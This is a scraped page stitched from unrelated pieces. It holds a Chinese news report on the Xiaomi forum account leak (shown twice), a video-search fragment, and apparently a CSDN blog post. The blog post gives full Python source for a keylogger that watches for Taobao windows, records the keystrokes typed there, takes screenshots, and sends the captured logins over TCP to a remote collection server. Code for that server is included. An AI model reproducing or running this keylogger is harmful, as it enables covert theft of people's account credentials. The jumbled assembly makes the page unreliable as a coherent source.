&&&新闻热线：021-
小米账号泄露：官方提醒修改密码
原标题：小米账号泄露：官方提醒修改密码
　　中青在线北京5月14日电（记者 王超）5月13日晚，乌云网证实小米论坛官方数据库泄露，涉及到百万级别的论坛注册用户。这些泄露的数据可以进入小米账户，通过小米云服务获得用户通讯录、照片、短信和通话记录等信息。
　　小米官方回应称，经查，确有部分2012年8月前注册的论坛账号信息被非法获取。
　　小米解释，这部分账号信息此前进行了严格加密，且不少用户近年已修改密码，实际可能存在风险的只有其中一小部分。截止公告前，我们尚未发现可见的流量异动以及投诉报告。
　　小米公司的建议是，2012年8月后注册小米账号的用户在本次事件中完全不受影响；对在此之前注册小米论坛账号，且在2012年8月后未修改过密码的用户，出于安全考虑，我们将通过短信、邮件等方式提示其尽快修改密码。对于前述可能存在风险的小部分账号，我们会要求其立即修改密码。
　　为什么会产生这一泄露？小米解释，在创业初期，小米的论坛及依附论坛产生的账号体系都使用了第三方开源程序。2012年8月，基于安全考虑，旧论坛账号体系不再使用，小米将所有服务(包括小米云服务、米币等)切换到全新的账号安全体系，采用业界最新安全实践方案，对所有存储数据均进行了最严格的安全加密。
　　之前，程序员网站CSDN被黑客攻击“拖库”泄露了大量密码，业界震动。一家网站的账号密码泄露并不会造成太多危险，许多人为了方便好记往往在所有的地方使用同一组ID和密码，从小米论坛、网易邮箱、新浪微博到天涯社区，黑客“拖库”后对目标帐号进行“试探”的成功率将会大大提高。
声明：凡注明为其他媒体来源的信息，均为转载自其他媒体，转载并不代表本网赞同其观点，也不代表本网对其真实性负责。您若对该稿件内容有任何疑问或质疑，请即与东方网联系，本网将迅速给您回应并做处理。
电话：021-
东方网()版权所有，未经授权禁止复制或建立镜像
小米账号泄露：官方提醒修改密码
日 20:24 来源:中青在线
原标题：小米账号泄露：官方提醒修改密码
　　中青在线北京5月14日电（记者 王超）5月13日晚，乌云网证实小米论坛官方数据库泄露，涉及到百万级别的论坛注册用户。这些泄露的数据可以进入小米账户，通过小米云服务获得用户通讯录、照片、短信和通话记录等信息。
　　小米官方回应称，经查，确有部分2012年8月前注册的论坛账号信息被非法获取。
　　小米解释，这部分账号信息此前进行了严格加密，且不少用户近年已修改密码，实际可能存在风险的只有其中一小部分。截止公告前，我们尚未发现可见的流量异动以及投诉报告。
　　小米公司的建议是，2012年8月后注册小米账号的用户在本次事件中完全不受影响；对在此之前注册小米论坛账号，且在2012年8月后未修改过密码的用户，出于安全考虑，我们将通过短信、邮件等方式提示其尽快修改密码。对于前述可能存在风险的小部分账号，我们会要求其立即修改密码。
　　为什么会产生这一泄露？小米解释，在创业初期，小米的论坛及依附论坛产生的账号体系都使用了第三方开源程序。2012年8月，基于安全考虑，旧论坛账号体系不再使用，小米将所有服务(包括小米云服务、米币等)切换到全新的账号安全体系，采用业界最新安全实践方案，对所有存储数据均进行了最严格的安全加密。
　　之前，程序员网站CSDN被黑客攻击“拖库”泄露了大量密码，业界震动。一家网站的账号密码泄露并不会造成太多危险，许多人为了方便好记往往在所有的地方使用同一组ID和密码，从小米论坛、网易邮箱、新浪微博到天涯社区，黑客“拖库”后对目标帐号进行“试探”的成功率将会大大提高。
声明：凡注明为其他媒体来源的信息，均为转载自其他媒体，转载并不代表本网赞同其观点，也不代表本网对其真实性负责。您若对该稿件内容有任何疑问或质疑，请即与东方网联系，本网将迅速给您回应并做处理。
电话：021-生死狙击帐号和密码大全_视频在线观看_百度视频
订阅精彩视频，请
生死狙击帐号和密码大全相关视频：
大家都在搜：
百度视频搜索结果源于互联网视频网站，系计算机系统根据搜索热度自动排列，不代表百度赞成被搜索网站的内容或立场。6687人阅读
Linux（19）
Python（65）
脚本语言（42）
& 在前面两篇文章中实现了将用户输入信息抓取到后，写入文件，把用户操作的截图也保存了下来，但些文件是在用户的机器上的，获取到并不容易，本次再次优化了下，将用户输入发送到监控者的电脑上，图片传送回来目前还没有实现，后续在分析。
一、代码：
服务端(hook_server.py)：
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
def hook_tcp_server():
Function:接收远程机器上发送过来的信息并输入出到终端
Input：even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
host = '192.168.1.101'
port = 34586
buf_size = 1024
addr =(host, port)
tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_server_socket.bind(addr)
tcp_server_socket.listen(5)
print 'waiting for connectiong...'
while True:
tcp_client_socket, addr = tcp_server_socket.accept()
# print 'connected from :', addr
while True:
msg = tcp_client_socket.recv(buf_size)
if not msg:
tcp_client_socket.close()
tcp_server_socket.close()
if __name__ == '__main__':
hook_tcp_server()
2. 客户端（hook_client.py）：
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pythoncom
import pyHook
import time
from PIL import ImageGrab
import socket
def send_msg_to_remote(msg):
Function:向远程服务器发送信息
Input：even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
host = '192.168.1.101'
port = 34586
buf_size = 1024
addr =(host, port)
if len(msg) != 0:
tcp_client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_client_sock.connect(addr)
except IOError, e:
print ('Error:%s' % e.args[0])
tcp_client_sock.close()
data = time.strftime('[%Y-%m-%d %H:%M:%S]',time.localtime(time.time()))
tip_info = data + 'from ' + socket.gethostname() + ':'
tcp_client_sock.sendall(tip_info + msg)
tcp_client_sock.close()
def onMouseEvent(event):
Function:处理鼠标左键单击事件，如果当前MSG中存放了信息，
将其写入文件，因为有的用户在输入 完用户名后，不是使用TAB键切换到密码
框,而是通过鼠标切换到密码输入窗口这种情况应该属于大多数网民的习惯，
所以此处要判断是否通过鼠标切换了输入窗口
Input：even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
global MSG
if len(MSG) != 0:
send_msg_to_remote(MSG)
#屏幕抓图实现
pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
pic = ImageGrab.grab()
pic.save('%s.png' % pic_name)
#保存成为以日期命名的图片
return True
def onKeyboardEvent(event):
&处理键盘事件&
Function:处理键盘事件，如果当前窗口为TAOBAO页面，刚开始监控并记录用户输入
因为此时用户可能准备输入用户名及密码进行登陆，所以将用户输入的所有可见
的ascii字符记录下来，此处要考虑用户是否使用了TAB键或回车键来
结束输入，此时要将信息发送给远程服务器。
Input：even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
global MSG
if event.WindowName.decode('GBK').find(u&淘宝&) != -1:
if (127 &= event.Ascii & 31) or (event.Ascii == 8):
MSG += chr(event.Ascii)
if (event.Ascii == 9) or (event.Ascii == 13):
send_msg_to_remote(MSG)
#屏幕抓图实现
pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
pic = ImageGrab.grab()
#保存成为以日期命名的图片
pic.save('%s.png' % pic_name)
return True
if __name__ == &__main__&:
Function:获取TAOBAO账号及密码，增加抓图功能
Input：NONE
Output: NONE
author: socrates
blog:http://blog.csdn.net/dyx1024
#创建hook句柄
hm = pyHook.HookManager()
hm.SubscribeMouseLeftDown(onMouseEvent)
hm.HookMouse()
hm.KeyDown = onKeyboardEvent
hm.HookKeyboard()
#循环获取消息
pythoncom.PumpMessages()
二、测试：
&1、环境信息：
& & & & & &服务端脚本hook_server.py运行于Unbutu上（IP:192.168.1.101，监听端口：34586）
& & & & & &客户端脚本hook_client.py运行于Windows xp上（主机名：winxp-duanyx）
& & 用户界面输入：
&服务器上获取到的数据：
参考知识库
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
访问：848290次
积分：10794
积分：10794
排名：第963名
原创：205篇
转载：43篇
译文：46篇
评论：322条
文章：23篇
阅读：34985
文章：51篇
阅读：33893
文章：69篇
阅读：362244
文章：16篇
阅读：125212